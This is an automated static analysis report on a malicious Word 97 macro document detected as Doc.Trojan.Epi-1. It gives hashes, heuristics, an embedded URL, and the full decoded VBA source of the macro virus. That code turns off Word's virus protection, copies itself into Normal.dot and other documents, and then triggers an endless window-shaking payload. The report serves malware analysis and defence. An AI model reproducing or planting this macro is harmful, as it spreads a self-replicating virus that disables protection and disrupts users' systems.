Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1940050c02437cf4…

MALICIOUS

Office (OLE)

56.0 KB Created: 1999-05-20 22:41:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 8f7f834cd2a8157263d83f8e4fe617a4 SHA-1: c3011a55db8b6a9dfc4b1ddf4a3201f15dfd23e1 SHA-256: 1940050c02437cf4d2a72ba900cc001e1ea7ec78fc04f1ef68b226f328a96946
122 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro that triggers on Document_Open. This macro attempts to copy its own code into the Normal.dot template, suggesting an effort to achieve persistence or spread. The presence of the 'ClamAV: Doc.Trojan.Epi-1' heuristic and the embedded URL 'http://www.hustler.com' further indicate malicious intent, likely related to a phishing or malware distribution campaign.

Heuristics 4

  • ClamAV: Doc.Trojan.Epi-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Epi-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.hustler.com In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11149 bytes
SHA-256: 4386ba8d055e1a63e139a9cf17b1e594f4d562e0bdf9ac9b40bfc7f53445c88d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Private Sub Document_Open()

On Error Resume Next

Options.VirusProtection = False

EpilepticFit

End Sub

Private Sub EpilepticFit()
    If Not ActiveDocument.VBProject.VBComponents(1).CodeModule.Find("Document_Open", 1, 1, 1000, 1000, False, False) Then
        For I = 1 To NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines
            lineofcode = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(I, 1)
            ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines I * 2, lineofcode
         Next I
        ' Save it
        If (Not ActiveDocument.ReadOnly) Then
            ActiveDocument.SaveAs AddToRecentFiles:=False
        End If
        
            
    ElseIf Not NormalTemplate.VBProject.VBComponents(1).CodeModule.Find("Document_Open", 1, 1, 1000, 1000, False, False) Then
            For I = 1 To ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
                lineofcode = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(I, 1)
                NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines I * 2, lineofcode
            Next I
            ' Save It
            NormalTemplate.Save
    Else
        'If the normal and active are infected now activate the payload
        Convulse
    End If
  
End Sub

Private Sub Convulse()
  
    Dim maxWidth As Long
    Dim maxHeight As Long
    maxWidth = ActiveWindow.Width
    maxHeight = ActiveWindow.Height
    
    maxHeight = maxHeight - 50
    maxWidth = maxWidth - 50
    If (ActiveWindow.WindowState <> wdWindowStateNormal) Then
            ActiveWindow.WindowState = wdWindowStateNormal
    End If
    ActiveWindow.Height = ActiveWindow.Height / 2
    ActiveWindow.Height = ActiveWindow.Height / 2
    Randomize
    While (True)
        
        
        
        If Int(2 * Rnd) = 1 Then
            If (ActiveWindow.Height > maxHeight) Then
               ActiveWindow.Height = ActiveWindow.Height - 50
            Else
                ActiveWindow.Height = ActiveWindow.Height + 50
            End If
            
            If (ActiveWindow.Width > maxWidth) Then
                ActiveWindow.Width = ActiveWindow.Width - 50
            Else
                ActiveWindow.Width = ActiveWindow.Width + 50
            End If
            
            If (ActiveWindow.VerticalPercentScrolled > 90) Then
                ActiveWindow.VerticalPercentScrolled = ActiveWindow.VerticalPercentScrolled - 10
            Else
                ActiveWindow.VerticalPercentScrolled = ActiveWindow.VerticalPercentScrolled + 10
            End If
        Else
         
            If (ActiveWindow.Height < 50) Then
                ActiveWindow.Height = ActiveWindow.Height - 50
            Else
                ActiveWindow.Height = ActiveWindow.Height + 50
            End If
           
            If (ActiveWindow.Width < 50) Then
                ActiveWindow.Width = ActiveWindow.Width - 50
            Else
                ActiveWindow.Width = ActiveWindow.Width + 50
            End If
               
            If (ActiveWindow.VerticalPercentScrolled < 10) Then
                ActiveWindow.VerticalPercentScrolled = ActiveWindowVerticalPercentScrolled + 10
            Else
                ActiveWindow.VerticalPercentScrolled = ActiveWindow.VerticalPercentScrolled - 10
            End If
        End If
        Start = Timer   ' Set start time.
        Do While Timer < Start + 0.2
            DoEvents    ' Yield to other processes.
        Loop
    Wend
End Sub

' Processing file: /opt/analyzer/scan_staging/403f97fae47d49a39f9f7d42789f93a6.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 18
... (truncated)